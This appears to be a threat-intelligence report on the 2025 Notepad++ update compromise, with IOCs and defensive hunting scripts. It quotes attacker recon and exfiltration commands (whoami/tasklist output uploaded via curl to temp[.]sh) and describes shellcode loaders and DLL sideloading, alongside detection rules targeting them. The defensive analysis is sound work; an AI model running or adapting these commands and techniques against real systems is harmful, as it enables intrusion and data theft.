Executive Summary
On February 2, 2026, the developers of Notepad++, a widely used text editor among software developers, published a public statement confirming that the project’s update infrastructure had been compromised.
According to the disclosure, the incident originated from a hosting provider–level compromise that occurred between June and September 2025. Although remediation efforts were initiated, attackers retained access to internal services until December 2025, enabling prolonged abuse of the update mechanism.
This access was leveraged to distribute malicious Notepad++ updates, resulting in a targeted supply chain attack affecting selected victims across multiple regions and sectors.
The activity has been attributed with high confidence to the Chinese advanced persistent threat (APT) group Lotus Blossom, an espionage-focused actor active since at least 2009.
The compromise led to the deployment of a previously undocumented custom backdoor, dubbed Chrysalis, along with multiple custom loaders employing advanced obfuscation techniques, including Microsoft Warbird. The campaign demonstrates a blend of bespoke malware, commodity offensive frameworks, and evolving evasion tradecraft, highlighting a clear maturation of the group’s operational capabilities.
Threat Actor Overview: Lotus Blossom
Lotus Blossom is a China-nexus espionage group historically targeting organizations across Southeast Asia, with more recent activity expanding into Central America. Known target sectors include:
- Government and public administration
- Telecommunications
- Aviation
- Critical infrastructure
- Media and information services
The group is characterized by long-term persistence, selective targeting, and the combined use of custom-developed malware and publicly available offensive tooling.
High-Level Attack Characteristics
Analysis of telemetry and forensic data revealed an unusually diverse and adaptive attack, characterized by:
- Multiple distinct execution chains
- Frequent rotation of:
- C2 infrastructure
- Download URLs
- Loader mechanisms
- Final-stage payloads
- Targeted distribution rather than indiscriminate mass infection
Over a four-month period (July–October 2025), attackers continuously modified their tradecraft to maintain access while reducing detection risk.
Victimology
Observed infections were limited in number (approximately a dozen machines) and targeted specific entities, including:
- Individual users located in:
- Vietnam
- El Salvador
- Australia
- A government organization in the Philippines
- A financial organization in El Salvador
- An IT services provider in Vietnam
The narrow targeting and rapid evolution of execution chains strongly suggest a deliberate, intelligence-driven operation rather than opportunistic malware distribution.
Affected Versions
| Version | Status | Notes |
| --- | --- | --- |
| < v8.8.7 | Vulnerable | Self-signed certificate, no proper verification of the downloaded installer |
| v8.8.7 | Vulnerable | GlobalSign certificate added, but no installer verification |
| v8.8.8 | Vulnerable | Downloads from GitHub only, still no installer verification |
| v8.8.9+ | Fixed | Certificate and signature verification enforced |
| v8.9.1 | Current | Recommended (self-signed certificate removed in v8.9) |
Infection Chain #1 – Late July to Early August 2025
Initial Payload Delivery
The first observed malicious update appeared in late July 2025, distributed from:
hxxp[:]//45[.]76[.]155[.]202/update/update.exe
The file (SHA1: 8e6e505438c21f3d281e1cc257abdbf7223b7f5a) was executed via the legitimate Notepad++ updater process (GUP.exe) and was identified as an NSIS installer approximately 1 MB in size.
System Profiling and Exfiltration
Upon execution, the installer performed the following actions:
- Created %APPDATA%\ProShow and set it as the working directory
- Executed: cmd /c whoami&&tasklist > 1.txt
- Uploaded 1.txt to temp[.]sh using: curl.exe -F "file=@1.txt" -s hxxps[:]//temp[.]sh/upload
- Transmitted the resulting upload URL back to the attacker via an HTTP request to hxxp[:]//45[.]76[.]155[.]202, with the temp[.]sh file URL embedded inside the User-Agent header
This unconventional use of the User-Agent field was later corroborated by community reports.
Second-Stage Payload: ProShow Exploitation
Following reconnaissance, the installer dropped several files into %APPDATA%\ProShow, including:
- ProShow.exe (legitimate software)
- load (malicious exploit payload)
- Supporting legitimate ProShow resource files
Instead of using DLL sideloading, attackers exploited a legacy vulnerability in ProShow software dating back to the early 2010s. The malicious load file contained two shellcodes:
- A decoy shellcode used as padding to mislead analysis
- An active shellcode, triggered upon ProShow execution
The active shellcode decrypted and executed a Metasploit downloader, which retrieved a Cobalt Strike Beacon shellcode.
Command-and-Control
Observed C2 infrastructure included:
- Initial payload delivery: hxxps[:]//45[.]77[.]31[.]210/users/admin
- Beacon communication: GET /api/update/v1 and POST /api/FileUpload/submit
In early August 2025, this infrastructure was migrated to cdncheck[.]it[.]com, with updated endpoints but an otherwise identical execution chain.
No further activity using Chain #1 was observed after early August.
Infection Chain #2 – Mid to Late September 2025
Updated NSIS Installer
In mid-September 2025, attackers resumed malicious update distribution using a new execution chain, again via:
hxxp[:]//45[.]76[.]155[.]202/update/update.exe
The new installer (SHA1: 573549869e84544e3ef253bdba79851dcde4963a) was significantly smaller (~140 KB).
Expanded Host Reconnaissance
Key changes included:
- Working directory changed to %APPDATA%\Adobe\Scripts
- More extensive system profiling: cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
The output was uploaded to temp[.]sh, with the resulting URL again transmitted inside the User-Agent header to a remote endpoint.
Lua-Based Shellcode Loader
The installer dropped several legitimate components of a Lua 5.1 runtime along with a malicious compiled Lua script disguised as a configuration file:
- alien.dll (legitimate; the Alien FFI library for Lua)
- lua5.1.dll (legitimate)
- script.exe (legitimate Lua interpreter)
- alien.ini (malicious; a compiled Lua script, not an INI file)
The following command was executed:
script.exe alien.ini
The compiled Lua script used the Alien FFI bindings to allocate executable memory, copied the shellcode into it, and transferred execution by passing the buffer as the enumeration callback to EnumWindowStationsW.
This shellcode again acted as a Metasploit downloader, retrieving a Cobalt Strike Beacon.
Infrastructure Evolution
Throughout late September, attackers made incremental changes:
- Split reconnaissance commands into multiple executions
- Migrated infrastructure to:
- self-dns[.]it[.]com
- safe-dns[.]it[.]com
- Updated User-Agent strings to newer browser versions
- Modified Cobalt Strike endpoints to resemble DNS and resolver services
Infection Chain #3 – October 2025
Transition to Custom Backdoor Deployment
In early October 2025, attackers introduced a third execution chain, delivered from:
hxxp[:]//45[.]32[.]144[.]255/update/update.exe
Unlike previous chains, this NSIS installer did not perform system profiling.
Instead, it dropped the following into %APPDATA%\Bluetooth:
- BluetoothService.exe (legitimate executable)
- log.dll (malicious)
- BluetoothService (encrypted shellcode)
Execution relied on DLL sideloading, a technique frequently observed in campaigns attributed to Chinese-speaking threat actors.
Final Payload: Chrysalis Backdoor
The malicious log.dll decrypted the shellcode stored in the BluetoothService file and executed it inside the BluetoothService.exe process, deploying the custom backdoor known as Chrysalis.
Unlike Chains #1 and #2, this execution path did not directly load a Cobalt Strike Beacon. However, forensic evidence from at least one affected host indicates that Cobalt Strike was later deployed as a secondary payload, using a Metasploit loader and infrastructure closely resembling earlier chains.
Notable similarities included:
- Identical XOR encryption key (CRAZY)
- Comparable /users/admin download paths
- Matching Cobalt Strike POST endpoints
update.exe Analysis
Analysis revealed that the Chain #3 update.exe is a Nullsoft Scriptable Install System (NSIS) installer. NSIS installers are frequently used by advanced threat actors to deliver staged payloads because of their flexibility and their ability to blend in with legitimate software installers.
Extracted Installer Components
| File Name | Description | SHA-256 |
| --- | --- | --- |
| [NSIS].nsi | NSIS installation script | 8ea8b83645fba6e23d48075a0d3fc73ad2ba515b4536710cda4f1f232718f53e |
| BluetoothService.exe | Renamed legitimate executable used for DLL sideloading | 2da00de67720f5f13b17e9d985fe70f10f153da60c9ab1086fe58f069a156924 |
| BluetoothService | Encrypted shellcode | 77bfea78def679aa1117f569a35e8fd1542df21f7e00e27f192c907e61d63a2e |
| log.dll | Malicious DLL sideloaded by BluetoothService.exe | 3bdc4c0637591533f1d4198a72a33426c01f69bd2e15ceee547866f65e26b7ad |
Installation Logic
The installer performs the following actions:
- Creates a directory named Bluetooth under %AppData%
- Copies all payload files into this directory
- Sets the directory attribute to HIDDEN
- Executes BluetoothService.exe, triggering DLL sideloading of log.dll
Chrysalis Backdoor Analysis
Loader and Execution Chain
The malicious DLL log.dll decrypts and executes embedded shellcode, loading a custom backdoor referred to as Chrysalis.
Key characteristics include:
- Use of legitimate binaries for DLL sideloading
- Generic module naming to evade filename-based detection
- Custom API hashing in both the loader and main module, each using distinct resolution logic
- Layered obfuscation and structured command-and-control (C2) communications
These characteristics indicate a mature, actively maintained malware family rather than a disposable implant.
Command and Control Configuration
| Parameter | Value |
| --- | --- |
| Module Name | BluetoothService |
| C2 URL | hxxps[:]//api[.]skycloudcenter[.]com/a/chat/s/{GUID} |
| User-Agent | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.4044.92 Safari/537.36 |
The C2 URL structure closely resembles API-based chat endpoints (e.g., /a/chat/s/{GUID}), suggesting deliberate traffic masquerading to blend with legitimate web API traffic.
At the time of analysis, the domain resolved to 61[.]4[.]102[.]97, an IP address located in Malaysia. No additional samples were observed communicating with this endpoint.
Host Profiling and Beaconing Behavior
Upon execution, Chrysalis collects the following system information:
- Current system time
- Installed antivirus products
- Operating system version
- Username
- Computer name
The malware concatenates the computer name, username, OS version, and a static version string (1.01), hashes the result using the FNV-1A algorithm, and converts the hash into a decimal ASCII representation. This value is used as a unique host identifier and encryption key for subsequent communications.
Encrypted data is transmitted over HTTPS (TCP port 443) using HttpSendRequestA with the POST method.
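To make the identifier concrete, the following is an added example (not code from the original report or from Chrysalis itself) that recomputes the host ID from the four inputs the text names. Three details are assumptions because the page does not state them: the hash width (the report only says FNV-1a, so the function takes it as a parameter and defaults to 32 bits), literal concatenation of the fields in the stated order with no separator, and UTF-8 encoding of the inputs. The sample host values in the main block are constructed.

```python
"""Recompute a Chrysalis-style host identifier from the fields the report names.

Added example; not code from the original report or from the malware.
Assumptions not stated on the page: 32-bit FNV-1a by default (the report
only says "FNV-1A"), the four fields concatenated in the stated order
with no separator, and UTF-8 encoding of the inputs.
"""

FNV32_OFFSET, FNV32_PRIME = 0x811C9DC5, 0x01000193
FNV64_OFFSET, FNV64_PRIME = 0xCBF29CE484222325, 0x00000100000001B3
STATIC_VERSION = "1.01"  # hard-coded version string from the report


def fnv1a(data: bytes, bits: int = 32) -> int:
    """Standard FNV-1a: XOR each byte in, then multiply by the FNV prime."""
    if bits == 32:
        h, prime = FNV32_OFFSET, FNV32_PRIME
    elif bits == 64:
        h, prime = FNV64_OFFSET, FNV64_PRIME
    else:
        raise ValueError("bits must be 32 or 64")
    mask = (1 << bits) - 1
    for byte in data:
        h ^= byte
        h = (h * prime) & mask
    return h


def host_id(computer_name: str, user_name: str, os_version: str, bits: int = 32) -> str:
    """Decimal ASCII form of the hash.  The report says this string is both
    the unique host identifier and the key for the subsequent C2 traffic.
    Field order follows the text: computer name, user name, OS version,
    static version string."""
    material = f"{computer_name}{user_name}{os_version}{STATIC_VERSION}".encode("utf-8")
    return str(fnv1a(material, bits))


if __name__ == "__main__":
    # Constructed inputs for illustration; the exact OS version format the
    # malware builds is not given on the page, so this value is a placeholder.
    print(host_id("DESKTOP-7F3Q2A", "alice", "10.0.19045"))
    print(host_id("DESKTOP-7F3Q2A", "alice", "10.0.19045", bits=64))
```

With the live values from a suspect host the resulting decimal string can be searched for in captured C2 POST bodies. Any difference in separator, field formatting or hash width yields a different number, so treat the function as a starting point to adjust against a decrypted sample rather than as a fixed signature.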
C2 Response Handling and Command Set
Response Validation
The malware validates responses by:
- Verifying HTTP status code 200
- Validating the associated WinInet handle
- Confirming payload structure integrity
A tag embedded in the response determines execution flow via a switch statement containing 16 possible command cases.
Additional Post-Compromise Tooling
Abuse of Tiny C Compiler
The following command execution was observed:
C:\ProgramData\USOShared\svchost.exe -nostdlib -run conf.c
Analysis determined that:
- svchost.exe was a renamed Tiny C Compiler (TCC)
- libtcc.dll confirmed compiler functionality
- conf.c was compiled and executed in memory
conf.c Payload Analysis
The C source file contains an embedded shellcode buffer, which is cast to a function pointer and executed. The shellcode is consistent with a 32-bit Metasploit block API payload.
The shellcode:
- Loads WinInet APIs dynamically
- Downloads a second-stage payload from api[.]wiresguard[.]com
- Transfers execution to the downloaded payload
Decrypted configuration confirms the payload as a Cobalt Strike HTTPS beacon, using the following endpoints:
- HTTP GET: /update/v1
- HTTP POST: /api/FileUpload/submit
Conclusion
This incident represents a highly adaptive and carefully managed supply chain attack. By compromising a trusted software update mechanism, attackers gained access to systems belonging to high-value individuals and organizations.
Key takeaways:
- Attackers rotated execution chains approximately once per month
- Both custom malware (Chrysalis) and commodity frameworks (Metasploit, Cobalt Strike) were used
- Multiple loading techniques were employed:
- Legacy software exploitation
- Lua-based in-memory execution
- DLL sideloading
- Infrastructure was continuously modified to evade detection
The limited scale of infections suggests that access to the update channel was treated as a sensitive asset, used sparingly and strategically.
Remediation
Primary Action: Update to Notepad++ v8.9.1 immediately via manual download from the official website or GitHub releases.
| Situation | Action |
| --- | --- |
| Running version < v8.8.9 | Update to v8.9.1 via manual download |
| Updated during June–December 2025 | Audit the system for the compromise indicators below, then update |
| Previously installed self-signed certificate | Remove the old Notepad++ root certificate from the certificate store |
| Enterprise deployment | Consider centralized package management; block gup.exe network access |
Detection and Hunting Recommendations
To identify potential compromises related to this campaign, defenders should consider the following:
Generic Hunting
- Investigate execution of NSIS installers, particularly those creating %LOCALAPPDATA%\Temp\ns*.tmp; every NSIS installer unpacks there, so validate the origin of each installer to reduce false positives
- Hunt for the files dropped by the three execution chains:
- %appdata%\ProShow\load
- %appdata%\Adobe\Scripts\alien.ini
- %appdata%\Bluetooth\BluetoothService
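The drop paths above, the script.exe alien.ini command from Chain #2 and the renamed Tiny C Compiler invocation from the post-compromise tooling section can be folded into one hunt over endpoint telemetry. The following is an added example, not code from the original report: a handful of rules run over process-creation and file-creation events. The event field names (type, image, parent, cmdline, target) are assumptions to map onto your own EDR or Sysmon schema; the paths and command lines come from the report, and the event records are constructed for the demonstration.

```python
"""Endpoint-telemetry hunt for the three Notepad++ execution chains.

Added example, not code from the original report.  A few rules run over
process-creation and file-creation events in the shape most EDR/Sysmon
exports use; the event field names (type, image, parent, cmdline,
target) are assumptions to map onto your own schema.  Paths and command
lines come from the report; the event records below are constructed.
"""
import re
from fnmatch import fnmatchcase

# Drop locations named in the report, %APPDATA% expanded to the Roaming
# profile path; everything is lower-cased before matching.
DROP_PATHS = (
    r"*\appdata\roaming\proshow\load",
    r"*\appdata\roaming\adobe\scripts\alien.ini",
    r"*\appdata\roaming\bluetooth\bluetoothservice",
)
# NSIS unpacks into %LOCALAPPDATA%\Temp\ns*.tmp.  Every NSIS installer does
# this, so the rule is a lead that needs the installer's origin checked.
NSIS_TEMP = (r"*\appdata\local\temp\ns*.tmp", r"*\appdata\local\temp\ns*.tmp\*")
# The only locations a genuine svchost.exe is loaded from.
SVCHOST_HOMES = (r"c:\windows\system32\svchost.exe", r"c:\windows\syswow64\svchost.exe")
TCC_RUN = re.compile(r"-nostdlib\s+-run\b")            # tcc "compile and run in memory"
LUA_LOADER = re.compile(r"\bscript\.exe\s+\S*alien\.ini\b")
RECON = ("whoami", "tasklist", "systeminfo", "netstat")


def _norm(path):
    return (path or "").lower().replace("/", "\\")


def rules_for(ev):
    """Names of every rule one event trips (empty list when clean)."""
    image, target = _norm(ev.get("image")), _norm(ev.get("target"))
    cmd = (ev.get("cmdline") or "").lower()
    hits = []
    if ev["type"] == "file":
        if any(fnmatchcase(target, p) for p in DROP_PATHS):
            hits.append("known_drop_path")
        if any(fnmatchcase(target, p) for p in NSIS_TEMP):
            hits.append("nsis_temp_dir")
    elif ev["type"] == "process":
        if image.endswith("\\svchost.exe") and image not in SVCHOST_HOMES:
            hits.append("svchost_outside_system_dir")
        if TCC_RUN.search(cmd):
            hits.append("tcc_run_flag")
        if LUA_LOADER.search(cmd):
            hits.append("lua_alien_loader")
        if image.endswith("\\curl.exe") and "temp.sh" in cmd:
            hits.append("tempsh_upload")
        # Chain 1 chained all recon in one command; chain 2 later split it
        # up, so one fragment plus a file redirect is enough to surface.
        if image.endswith("\\cmd.exe") and ">" in cmd and any(r in cmd for r in RECON):
            hits.append("recon_to_file")
    return hits


def hunt(events):
    """Map event id -> rule names, keeping only events that tripped one."""
    return {ev["id"]: hits for ev in events if (hits := rules_for(ev))}


# Constructed telemetry, not real logs.  Events 1-6 replay fragments of the
# three chains in order; 7 and 8 are benign look-alikes.
SAMPLE_EVENTS = [
    {"id": 1, "type": "file", "image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "target": r"C:\Users\alice\AppData\Local\Temp\nsk3F2.tmp"},
    {"id": 2, "type": "process", "parent": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /c whoami&&tasklist > 1.txt"},
    {"id": 3, "type": "process", "parent": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": 'curl.exe -F "file=@1.txt" -s https://temp.sh/upload'},
    {"id": 4, "type": "file", "image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "target": r"C:\Users\alice\AppData\Roaming\Adobe\Scripts\alien.ini"},
    {"id": 5, "type": "process", "parent": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "image": r"C:\Users\alice\AppData\Roaming\Adobe\Scripts\script.exe",
     "cmdline": "script.exe alien.ini"},
    {"id": 6, "type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\ProgramData\USOShared\svchost.exe",
     "cmdline": r"C:\ProgramData\USOShared\svchost.exe -nostdlib -run conf.c"},
    {"id": 7, "type": "process", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs -p"},
    {"id": 8, "type": "file", "image": r"C:\Users\alice\Downloads\some-tool-setup.exe",
     "target": r"C:\Users\alice\AppData\Local\Temp\nsa91B.tmp"},
]

if __name__ == "__main__":
    for event_id, rules in hunt(SAMPLE_EVENTS).items():
        print(event_id, ", ".join(rules))
```

Event 8 is the caveat from the list above made visible: a benign NSIS installer trips nsis_temp_dir exactly like the malicious update.exe, so that rule is only useful once joined with the installer's download source or signer. The svchost and TCC rules, by contrast, have essentially no legitimate trigger and can be promoted to alerts as they stand.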
Network-Based Detection
- Search for DNS or HTTP traffic involving temp[.]sh
- Look for HTTP requests with URLs embedded in User-Agent headers
- Monitor for suspicious updater-related traffic to unfamiliar IPs or domains
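The three network items above, together with the User-Agent trick described under Infection Chain #1, can be checked against web-proxy logs. The following is an added example, not code from the original report. It parses proxy lines in Apache combined layout with the absolute URL in the request line, as most forward proxies log it, and flags traffic to temp[.]sh, a URL carried inside the User-Agent header, and an .exe fetched from a bare-IP /update/ path (a heuristic derived from the three delivery URLs in the IOC list, not a rule from the report). The log lines are constructed; the IOC addresses appear undefanged only so the parser can consume them. Crawlers legitimately put a URL in their User-Agent using the "+http://" convention, so the rule ignores that form.

```python
"""Proxy-log hunt for the User-Agent exfiltration trick and temp.sh staging.

Added example, not code from the original report.  Parses web-proxy lines
in Apache "combined" layout (absolute URL in the request line) and flags
three things the report describes.  The log lines below are constructed;
the rule names and the bare-IP /update/ heuristic are the example's own.
"""
import re
from urllib.parse import urlsplit

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A URL inside the User-Agent.  "+http://..." is the well-known crawler
# convention (Googlebot, Bingbot, ...), so it is excluded via the lookbehind.
URL_IN_UA = re.compile(r'(?<!\+)https?://[^\s"]+')
BARE_IP = re.compile(r'^\d{1,3}(?:\.\d{1,3}){3}$')
PASTE_HOSTS = {"temp.sh"}   # throwaway file host used in chains 1 and 2; extend as needed


def parse_line(line):
    """Return a dict of fields, or None when the line is not in combined layout."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["url"])
    rec["host"], rec["path"] = (parts.hostname or "").lower(), parts.path
    return rec


def findings_for(rec):
    """(rule, detail) pairs for one parsed record."""
    out = []
    if rec["host"] in PASTE_HOSTS:
        out.append(("tempsh_traffic", f'{rec["method"]} {rec["url"]}'))
    for url in URL_IN_UA.findall(rec["ua"]):
        out.append(("url_in_user_agent", url))
    path = rec["path"].lower()
    if BARE_IP.match(rec["host"]) and path.startswith("/update/") and path.endswith(".exe"):
        out.append(("exe_from_bare_ip_update_path", rec["url"]))
    return out


def hunt(lines):
    """Return [(line_no, rule, detail), ...] over an iterable of log lines."""
    results = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec:
            results.extend((n, rule, detail) for rule, detail in findings_for(rec))
    return results


# Constructed proxy lines.  Line 1 is the installer fetch, 2 the curl upload,
# 3 the callback with the temp.sh URL in the User-Agent, 4 and 5 are benign.
SAMPLE_LOG = """\
10.0.0.23 - - [29/Jul/2025:09:14:02 +0000] "GET http://45.76.155.202/update/update.exe HTTP/1.1" 200 1048576 "-" "Mozilla/4.0 (compatible)"
10.0.0.23 - - [29/Jul/2025:09:14:09 +0000] "POST https://temp.sh/upload HTTP/1.1" 200 64 "-" "curl/8.4.0"
10.0.0.23 - - [29/Jul/2025:09:14:10 +0000] "GET http://45.76.155.202/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) https://temp.sh/xyz12/1.txt"
10.0.0.45 - - [29/Jul/2025:09:15:00 +0000] "GET https://www.example.com/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0 Safari/537.36"
203.0.113.9 - - [29/Jul/2025:09:16:00 +0000] "GET https://www.example.com/robots.txt HTTP/1.1" 200 80 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
""".splitlines()

if __name__ == "__main__":
    for line_no, rule, detail in hunt(SAMPLE_LOG):
        print(f"line {line_no}: {rule}: {detail}")
```

The url_in_user_agent rule is the high-value one here: a browser-style User-Agent string that ends in a file-hosting URL has no benign explanation, and the extracted URL is itself an artifact worth retrieving before the host expires it.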
IOCs
| Type | Name | Value |
| --- | --- | --- |
| Binary | update.exe | a511be5164dc1122fb5a7daa3eef9467e43d8458425b15a640235796006590c9 |
| Binary | [NSIS].nsi | 8ea8b83645fba6e23d48075a0d3fc73ad2ba515b4536710cda4f1f232718f53e |
| Binary | BluetoothService.exe | 2da00de67720f5f13b17e9d985fe70f10f153da60c9ab1086fe58f069a156924 |
| Binary | BluetoothService | 77bfea78def679aa1117f569a35e8fd1542df21f7e00e27f192c907e61d63a2e |
| Binary | log.dll | 3bdc4c0637591533f1d4198a72a33426c01f69bd2e15ceee547866f65e26b7ad |
| Binary | u.bat | 9276594e73cda1c69b7d265b3f08dc8fa84bf2d6599086b9acc0bb3745146600 |
| Binary | conf.c | f4d829739f2d6ba7e3ede83dad428a0ced1a703ec582fc73a4eee3df3704629a |
| Binary | libtcc.dll | 4a52570eeaf9d27722377865df312e295a7a23c3b6eb991944c2ecd707cc9906 |
| Binary | admin | 831e1ea13a1bd405f5bda2b9d8f2265f7b1db6c668dd2165ccc8a9c4c15ea7dd |
| Binary | loader1 | 0a9b8df968df41920b6ff07785cbfebe8bda29e6b512c94a3b2a83d10014d2fd |
| Binary | uffhxpSy | 4c2ea8193f4a5db63b897a2d3ce127cc5d89687f380b97a1d91e0c8db542e4f8 |
| Binary | loader2 | e7cd605568c38bd6e0aba31045e1633205d0598c607a855e2e1bca4cca1c6eda |
| Binary | 3yzr31vk | 078a9e5c6c787e5532a7e728720cbafee9021bfec4a30e3c2be110748d7c43c5 |
| Binary | ConsoleApplication2.exe | b4169a831292e245ebdffedd5820584d73b129411546e7d3eccf4663d5fc5be3 |
| Binary | system | 7add554a98d3a99b319f2127688356c1283ed073a084805f14e33b4f6a6126fd |
| Binary | s047t5g.exe | fcc2765305bcd213b7558025b2039df2265c3e0b6401e4833123c461df2de51a |
| IP | 95.179.213.0 | |
| Domain | api[.]skycloudcenter[.]com | |
| Domain | api[.]wiresguard[.]com | |
| IP | 61.4.102.97 | |
| IP | 59.110.7.32 | |
| IP | 124.222.137.114 | |
| URL | hxxp[:]//45[.]76[.]155[.]202/update/update.exe | |
| URL | hxxp[:]//45[.]32[.]144[.]255/update/update.exe | |
| URL | hxxp[:]//95[.]179[.]213[.]0/update/update.exe | |
| URL | hxxp[:]//95[.]179[.]213[.]0/update/install.exe | |
| URL | hxxp[:]//95[.]179[.]213[.]0/update/AutoUpdater.exe | |
| URL | hxxp[:]//45[.]76[.]155[.]202/list | |
| URL | hxxps[:]//self-dns[.]it[.]com/list | |
| URL | hxxps[:]//45[.]77[.]31[.]210/users/admin | |
| URL | hxxps[:]//cdncheck[.]it[.]com/users/admin | |
| URL | hxxps[:]//safe-dns[.]it[.]com/help/Get-Start | |
| URL | hxxps[:]//45[.]77[.]31[.]210/api/update/v1 | |
| URL | hxxps[:]//45[.]77[.]31[.]210/api/FileUpload/submit | |
| URL | hxxps[:]//cdncheck[.]it[.]com/api/update/v1 | |
| URL | hxxps[:]//cdncheck[.]it[.]com/api/Metadata/submit | |
| URL | hxxps[:]//cdncheck[.]it[.]com/api/getInfo/v1 | |
| URL | hxxps[:]//cdncheck[.]it[.]com/api/FileUpload/submit | |
| URL | hxxps[:]//safe-dns[.]it[.]com/resolve | |
| URL | hxxps[:]//safe-dns[.]it[.]com/dns-query | |
| URL | hxxps[:]//api[.]skycloudcenter[.]com/a/chat/s/70521ddf-a2ef-4adf-9cf0-6d8e24aaa821 | |
| URL | hxxps[:]//api[.]wiresguard[.]com/update/v1 | |
| URL | hxxps[:]//api[.]wiresguard[.]com/api/FileUpload/submit | |
| URL | hxxp[:]//59[.]110[.]7[.]32:8880/uffhxpSy | |
| URL | hxxp[:]//59[.]110[.]7[.]32:8880/api/getBasicInfo/v1 | |
| URL | hxxp[:]//59[.]110[.]7[.]32:8880/api/Metadata/submit | |
| URL | hxxp[:]//124[.]222[.]137[.]114:9999/3yZR31VK | |
| URL | hxxp[:]//124[.]222[.]137[.]114:9999/api/updateStatus/v1 | |
| URL | hxxp[:]//124[.]222[.]137[.]114:9999/api/Info/submit | |
| URL | hxxps[:]//api[.]wiresguard[.]com/users/system | |
| URL | hxxps[:]//api[.]wiresguard[.]com/api/getInfo/v1 | |
References:
hxxps[:]//notepad-plus-plus[.]org/news/hijacked-incident-info-update/
hxxps[:]//orca[.]security/resources/blog/notepad-plus-plus-supply-chain-attack/
hxxps[:]//securelist[.]com/notepad-supply-chain-attack/118708/
hxxps[:]//www[.]rapid7[.]com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/
hxxps[:]//nvd[.]nist[.]gov/vuln/detail/CVE-2025-56383